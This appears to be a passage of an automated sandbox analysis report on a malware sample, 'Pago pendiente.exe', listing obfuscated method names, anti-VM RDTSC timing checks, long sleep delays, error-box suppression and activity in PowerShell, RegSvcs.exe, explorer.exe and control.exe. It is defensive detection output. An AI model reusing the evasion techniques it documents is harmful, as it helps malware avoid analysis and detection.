          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, Cv3u2mMLqgVyop0G1AN.csHigh entropy of concatenated method names: 'QE9bwYLlcx', 'lFYbx8ZWHq', 'QECbSXGNq7', 'up9bXaaXRy', 'L2Jbf5gSnI', 'i26b5MNxtF', 'IPEbRZ6nZg', 'feLbAFLIyZ', 'SX2bkZB8WM', 'vZGbNpl7X9'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, M4qQq4G1UrG1lP8ZE3.csHigh entropy of concatenated method names: 'yqnMoQKgXN', 'YhiMdaS4o0', 'RmRMOq3rAq', 'Kw2M4hTpd1', 'rlcMBQyXHo', 'NF0M0euJQf', 'zDSt40cPsStBkEWNhs', 'YbGCJpH1L1Lx4m0ik3', 'i9WMMlK87V', 'X5FMuNCWaF'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, Fpd1sFNOxY2GMblcQy.csHigh entropy of concatenated method names: 'sTBDfZihnL', 'USEDRBxAHj', 'RhIreDRDPG', 'LaIrnBLx6j', 'bOWrUEnLaP', 'CYarHfEKWu', 'na5rgoqaWL', 'chgrW8aZPo', 'snGrILIsl5', 'cuhrPnjlWJ'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, x7wBW7KwVdGRUhw4G0.csHigh entropy of concatenated method names: 'BHmBPRL8nw', 'RpIBZ01ddK', 'IWQBK0QRp2', 'lW7BlGBUe4', 'KPFB2sJggf', 'VcRBeUCbxU', 'J6cBnFqXgA', 'DTYBUbFk0k', 'HW9BHgoWbE', 'gZYBgvhG4A'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, gRCKFRiRDdgItJqDny.csHigh entropy of concatenated method names: 'R2Q796ZjJ0', 'nGH7J1RSiL', 'cWo7rjppKl', 'M4n7D9PpUl', 'qY076f68Vm', 'Q5S7oPrHjm', 'SFy7djiqUW', 'DpX7Fsi2CQ', 'hO97OPJ947', 'sky74VCD4G'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, cX4ZgRg3HpJweDXnri.csHigh entropy of concatenated method names: 'uvOo9Flv6v', 'C59or7autg', 'pu2o6nkMlY', 'yyK6m3kqSR', 'TAJ6zgUuBZ', 'hXfoLttTSi', 'eXxoM62lBt', 'hAOoYkeKgm', 'SdGou63t9e', 'w0MoGvcpUM'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, G3nNu1yLLZWCVb0s4T.csHigh entropy of concatenated method names: 'I0epOVONQy', 'U5wp42Kpdw', 'ToString', 'Gkgp9AVYmT', 'bdypJPZiGi', 'WWFprCO0mW', 'ecVpDSJPS1', 'MTrp6kLwKR', 'jhipoLFcxT', 'QxapdnyfIX'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, Dx00SKjxnAybQBXMSH.csHigh entropy of concatenated method names: 'K0n7TAD3YQ', 'jBa72rbjiR', 'BeB7eVO3Pj', 'AxG7n4qmbF', 'uLp7Kdq7Fk', 'z2g7UnZ9Eq', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, Mj6eLHr9Gfok1X3SWR.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gsRYjndp2q', 'R5bYmWxL1B', 'g9gYzAOCnp', 'CtEuLqr905', 'We3uM0cMgf', 'ExiuY7YWrV', 'iCLuuAajeV', 'wQR1QxYiF46ddfUAkNL'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, JiUYX5IaJZrrF9fpAJ.csHigh entropy of concatenated method names: 'RyKowX41g1', 'zU0oxhhmtr', 'wq2oSV2sd3', 'NvQoXbyikM', 'FbHof9mDFB', 'ALWo5TqOAw', 'CohoRBr8Fh', 'tjJoAaNnKp', 'MQrokDwjcJ', 'qoRoN9tfQ7'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, FmJaeetirRTGV3GUfA.csHigh entropy of concatenated method names: 'ToString', 'bq60ClfX1X', 'psn02UaZq6', 'VHO0e9q9o6', 'fFJ0nbCFsR', 'xjd0U58dlC', 'sAZ0HDeoAe', 'sox0g7Bv8w', 'NF40WmuXuD', 'ePd0Is7qtL'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, ifpL5MvflcOluxXgWa.csHigh entropy of concatenated method names: 'cV7piNaiMo', 'BxepmnLu6c', 'yjq7L0FqN2', 'GlD7MGNJvi', 'gbxpCDRT9N', 'qKOpZaCMop', 'rPPp31NpuZ', 'Nx1pKOH96S', 'bSJplEqxLd', 'FqWptCqVYD'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTR
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 25A9904 second address: 25A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 25A9B7E second address: 25A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: 52D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: 9840000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: A840000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: AA60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: BA60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: BF80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: CF80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: DF80000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\Pago pendiente.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5983Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3765Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9744Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 9840Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13933
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 1.6 %
          Source: C:\Users\user\Desktop\Pago pendiente.exe TID: 5644Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4536Thread sleep count: 197 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4536Thread sleep time: -394000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4536Thread sleep count: 9744 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4536Thread sleep time: -19488000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1632Thread sleep count: 131 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1632Thread sleep time: -262000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1632Thread sleep count: 9840 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1632Thread sleep time: -19680000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Pago pendiente.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
